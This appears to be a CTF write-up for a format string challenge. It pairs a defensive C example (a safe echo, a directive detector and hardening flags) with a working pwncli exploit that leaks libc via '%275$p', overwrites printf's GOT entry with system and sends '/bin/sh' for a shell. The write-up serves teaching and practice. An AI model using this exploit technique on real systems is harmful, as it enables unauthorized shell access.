Approach
No protections at all, so the binary is almost a giveaway. It is a classic format string bug; here I chose to overwrite printf's GOT entry with the address of system, then send /bin/sh as the next input so that the printf call becomes system("/bin/sh") and hands us a shell.
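For the defensive side of the same bug, here is an added example that is not part of the writeup, the challenge binary, or pwncli: the hardened echo pattern that removes the format string bug, a small heuristic that flags directive-like input for logging, and a note on the build settings (full RELRO and -Werror=format-security) that would have blocked the GOT overwrite. Function names and the sample strings are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example, not part of the writeup. The challenge hands user input
 * to printf as the format string, which is what lets "%275$p" leak a libc
 * address and "%n"-style writes redirect the GOT:
 *
 *     printf(user);              // format string bug: user controls the format
 *
 * The hardened form below passes user data as an argument to a fixed
 * format, so every '%' in it is printed literally. Two build settings
 * would also have closed this exploit path: -Wformat -Werror=format-security
 * turns printf(user) into a compile error, and -Wl,-z,relro,-z,now
 * (full RELRO) makes the GOT read-only after loading, so printf@got cannot
 * be rewritten to point at system.
 */

/* Echo untrusted input through a fixed format. Returns the formatted
 * string from a static buffer; the input is copied verbatim. */
const char *safe_echo(const char *user)
{
    static char out[256];
    snprintf(out, sizeof out, "%s", user);
    return out;
}

/* Heuristic detector for logging: does the input contain something that
 * printf would treat as a conversion directive (flags, width, positional
 * "N$", length modifier, conversion letter)? "%%" is a literal percent.
 * Returns 1 if a directive-like sequence is found, 0 otherwise. This only
 * flags suspicious input; it does not replace the fix above. */
int looks_like_format_directive(const char *s)
{
    for (const char *p = strchr(s, '%'); p; p = strchr(p + 1, '%')) {
        const char *q = p + 1;
        if (*q == '%') { p = q; continue; }              /* "%%": skip both */
        while (*q && strchr("-+ #0123456789.$", *q)) q++; /* flags, width, N$, precision */
        while (*q == 'h' || *q == 'l' || *q == 'L' || *q == 'q' ||
               *q == 'j' || *q == 'z' || *q == 't') q++;   /* length modifiers */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample inputs: plain text, the leak probe used in the
     * writeup, an escaped percent, and a byte-write directive. */
    const char *samples[] = { "hello", "%275$p", "100%% done", "%hhn" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s directive=%d echoed=\"%s\"\n", samples[i],
               looks_like_format_directive(samples[i]), safe_echo(samples[i]));
    return 0;
}
```

The detector is deliberately permissive (a lone "% o" is a valid directive and will be flagged), so treat its hits as a logging signal rather than a blocklist; the actual fix is the fixed format string plus the linker and compiler flags in the comment.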
Exploit
```python
from pwncli import *

# pwncli: parse the command line (local binary or remote target) and hand
# back the tube and the matching libc through the `gift` dict.
cli_script()
p = gift['io']
libc = gift['libc']


def fmt_attack(p, fmt):
    """Menu option 1 takes our string, option 2 passes it to printf()."""
    p.sendlineafter(b"3) Exit\n", b"1")
    p.sendline(fmt)
    p.sendlineafter(b"3) Exit\n", b"2")
    msg = p.recvline()
    info("msg recv: {}".format(msg))
    return msg


# Leak a return address into __libc_start_main from the stack (argument 275)
# and subtract its offset inside that function (241 for this libc) to get the base.
msg = fmt_attack(p, b"%275$p")
libc_base_addr = int16(msg.decode()) - libc.sym['__libc_start_main'] - 241
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)

# Format string write: overwrite printf@got (0x804a010, no RELRO) with system.
payload = fmtstr_payload(offset=16, writes={0x804a010: libc.sym['system']},
                         write_size="short", write_size_max="short")
fmt_attack(p, payload)

# printf("/bin/sh") is now system("/bin/sh").
p.sendlineafter(b"3) Exit\n", b"1")
p.sendline(b"/bin/sh")
p.sendlineafter(b"3) Exit\n", b"2")
p.interactive()
```
References
1. My Blog
2. CTF Wiki
3. pwncli